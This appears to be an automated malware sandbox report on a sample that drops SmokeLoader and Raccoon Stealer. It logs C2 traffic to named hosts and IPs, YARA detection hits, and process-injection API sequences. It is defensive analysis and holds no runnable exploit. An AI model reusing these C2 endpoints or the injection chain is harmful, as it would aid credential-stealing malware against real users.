ad ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 75 01 35 07 1e fe 63 4b 83 8b 14 ca c3 f3 b2 ec 92 c0 15 1c 57 ec 87 7e 0c 35 8a 3d 50 7f d0 56 81 96 9b 97 7e 70 9f 6a a8 a5 17 08 e8 e1 98 ab e1 5f 11 87 4a 71 87 56 b0 50 f6 0a bf d9 6b 91 e0 55 d0 66 21 df 76 79 27 24 58 96 3a 39 d1 da 03 d4 30 74 61 27 47 c2 e6 5e 89 b2 e2 9b 52 ec c0 76 a7 e2 f0 b5 c3 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 78 2d 7f d4 2c d6 e8 b1 14 73 71 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 70 9c 82 97 d1 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 36 41 ae e4 c3 88 3e 9d 43 dd 17 fe 2f 43 9e 8e ea 4c 76 7b de e2 46 f0 2e 56 bb 43 3e 8f 17 94 6b 36 a4 29 ec 90 bc 10 c9 2a 7c bd 67 c1 aa d7 b0 5d 28 ed fe 7b 9c 4d 16 94 18 42 26 2e 92 cc 1e fe 18 aa 34 a6 6d 96 8e a4 42 1f 01 31 fd ce 0f 88 f4 0e 37 c4 fe 87 75 87 f0 d3 4b 1d 53 58 1d a5 05 80 e0 2d f0 0e 55 f6 1f 5f a1 67 50 41 48 ab 0b 52 ea 5a 15 6c de 30 ea 2e ad 46 6a de 5e f7 44 18 bd 95 59 f8 d2 3e b8 77 24 7e 65 b9 0a f1 91 cf f3 bc 34 bc 36 b3 ec d3 70 01 21 f4 5c 58 2b 72 12 c9 8e 70 ac e4 26 be 99 04 33 2b 22 f5 2d 09 7d a2 d1 92 4b de 94 cf 91 7b 41 0a f6 29 8f 4d aa d1 b9 ba 97 30 d0 47 43 05 f2 42 e6 56 91 24 c8 00 66 b4 ea f1 ea 7f ae 1a a5 f4 ea 4c 90 54 77 8b ee 2b 0b 67 45 12 c3 3e ba 2d 09 86 99 57 f9 68 8d 90 26 d3 d6 c0 c8 30 6f 41 cb 1b b9 71 ca 6d 88 44 13 51 13 66 7d 6c 65 04 f5 7f f6 50 99 85 84 90 c1 2f d1 0c 6a c3 1b 95 50 49 25 3f d2 3e 20 12 1e b7 6b 6c cc bd 41 2b 1b 23 28 21 ae 60 78 2f 46 5e 1e b2 57 d9 bd be 2f 83 ef d9 a7 8f 83 f1 60 4c 72 fe 24 f4 89 6f e4 f7 81 c4 ff 58 4f dd d7 ef 3d 08 bb 78 fd 16 f7 c9 66 bd 2b da df 97 5f 29 86 97 72 20 bd 29 71 96 25 a6 46 bd 59 f8 b6 06 d7 55 02 a0 48 79 68 42 65 09 90 ed ff 21 ab c0 00 75 94 f2 cb 54 26 12 ad 67 61 8a ec 1c dc ce 76 60 4c 00 c8 98 ff e0 2b 03 c6 c0 fb 71 7b 01 00 a5 20 e0 e2 cc 93 4f fd 40 9c 81 b9 f3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:11:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 93.115.20.139
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xauocndh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: hajezey1.top
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49808 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected SmokeLoader
Source: Yara match File source: 19.0.jejhieg.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.C5EA.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.C5EA.exe.2ba15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.jejhieg.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.1.jejhieg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.1.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.C5EA.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.cnv622JnZv.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.jejhieg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.8615.exe.2fb0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.C5EA.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.3.8615.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.jejhieg.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.jejhieg.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.8615.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000021.00000002.465682057.00000000047F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.440048320.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.440144777.0000000002FF1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.320318511.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.379053476.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.302632865.0000000004F61000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.379166058.0000000001F61000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.464888081.0000000002B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.423422124.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.320173015.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: cnv622JnZv.exe, 00000000.00000002.258287282.0000000002EAA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 35.3.152F.exe.48f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.152F.exe.48f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.152F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.152F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.460198021.00000000048F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.478734177.0000000000941000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.476969852.00000000013F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.593634201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 152F.exe PID: 1280, type: MEMORYSTR

System Summary:

barindex
.NET source code contains very large array initializations
Source: 977B.exe.6.dr, ??????????????/_?????xptkvqfesn.cs Large array initialization: _?????nacpgkwmie: array initializer size 208904
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49AB40 24_2_6B49AB40
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B493360 24_2_6B493360
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A309 24_2_6B49A309
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AABD8 24_2_6B4AABD8
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4C8BE8 24_2_6B4C8BE8
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5223E3 24_2_6B5223E3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B51EB8A 24_2_6B51EB8A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AEBB0 24_2_6B4AEBB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52FA2B 24_2_6B52FA2B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53E2C5 24_2_6B53E2C5
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534AEF 24_2_6B534AEF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5432A9 24_2_6B5432A9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B494120 24_2_6B494120
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B492990 24_2_6B492990
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4999BF 24_2_6B4999BF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A8840 24_2_6B4A8840
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B476800 24_2_6B476800
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B531002 24_2_6B531002
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49A830 24_2_6B49A830
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48B090 24_2_6B48B090
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A2F70 24_2_6B4A2F70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5367E2 24_2_6B5367E2
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4FAE60 24_2_6B4FAE60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B496E30 24_2_6B496E30
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B542EF7 24_2_6B542EF7
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B541D55 24_2_6B541D55
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B492D50 24_2_6B492D50
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B470D20 24_2_6B470D20
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A35D0 24_2_6B4A35D0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B492430 24_2_6B492430
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534496 24_2_6B534496
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47EC9B 24_2_6B47EC9B
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00425150 34_2_00425150
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_0042419D 34_2_0042419D
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_0041FAF0 34_2_0041FAF0
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00403340 34_2_00403340
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00414437 34_2_00414437
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00422E27 34_2_00422E27
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00422F47 34_2_00422F47
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_0041FF88 34_2_0041FF88
PE file contains strange resources
Source: 8615.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8615.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8615.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8615.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8615.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8615.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8615.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2E26.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bejhieg.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bejhieg.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bejhieg.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bejhieg.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bejhieg.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bejhieg.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: bejhieg.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.22.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.22.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Uses 32bit PE files
Source: cnv622JnZv.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 29.0.A557.exe.2d0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.77DC.exe.a50000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 29.0.A557.exe.2d0000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 22.0.66A4.exe.d70000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 22.0.66A4.exe.d70000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 22.0.66A4.exe.d70000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 22.0.66A4.exe.d70000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 29.2.A557.exe.2d0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.77DC.exe.a50000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 29.0.A557.exe.2d0000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 29.0.A557.exe.2d0000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.77DC.exe.a50000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.2.77DC.exe.a50000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.77DC.exe.a50000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\A557.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\66A4.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\77DC.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: String function: 00410ED0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: String function: 0040FB00 appears 101 times
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: String function: 0040B550 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: String function: 6B505720 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: String function: 6B47B150 appears 128 times
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: String function: 6B4CD08C appears 41 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_0040185B Sleep,NtTerminateProcess, 3_2_0040185B
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_00401866 Sleep,NtTerminateProcess, 3_2_00401866
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_0040187A Sleep,NtTerminateProcess, 3_2_0040187A
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_0040163B NtMapViewOfSection, 3_2_0040163B
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_004018D3 NtTerminateProcess, 3_2_004018D3
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_00401884 Sleep,NtTerminateProcess, 3_2_00401884
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_00401888 NtTerminateProcess, 3_2_00401888
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_0040156A NtMapViewOfSection, 3_2_0040156A
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 3_2_004015DB
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_2_004017EA Sleep,NtTerminateProcess, 3_2_004017EA
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_1_0040156A NtMapViewOfSection, 3_1_0040156A
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_1_004015DB NtMapViewOfSection,NtMapViewOfSection, 3_1_004015DB
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 3_1_0040163B NtMapViewOfSection, 3_1_0040163B
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 17_2_02BA0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 17_2_02BA0110
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_0040185B Sleep,NtTerminateProcess, 18_2_0040185B
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_00401866 Sleep,NtTerminateProcess, 18_2_00401866
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_0040187A Sleep,NtTerminateProcess, 18_2_0040187A
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_0040163B NtMapViewOfSection, 18_2_0040163B
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_004018D3 NtTerminateProcess, 18_2_004018D3
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_00401884 Sleep,NtTerminateProcess, 18_2_00401884
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_00401888 NtTerminateProcess, 18_2_00401888
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_0040156A NtMapViewOfSection, 18_2_0040156A
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 18_2_004015DB
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Code function: 18_2_004017EA Sleep,NtTerminateProcess, 18_2_004017EA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_0040181C Sleep,NtTerminateProcess, 24_2_0040181C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402406 NtEnumerateKey, 24_2_00402406
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00401F25 NtQuerySystemInformation, 24_2_00401F25
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00401828 Sleep,NtTerminateProcess, 24_2_00401828
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402431 NtEnumerateKey, 24_2_00402431
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_004017DA Sleep,NtTerminateProcess, 24_2_004017DA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_004017F8 NtTerminateProcess, 24_2_004017F8
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_0040209A NtQuerySystemInformation, 24_2_0040209A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_004017A3 Sleep,NtTerminateProcess, 24_2_004017A3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B99A0 ZwCreateSection,LdrInitializeThunk, 24_2_6B4B99A0
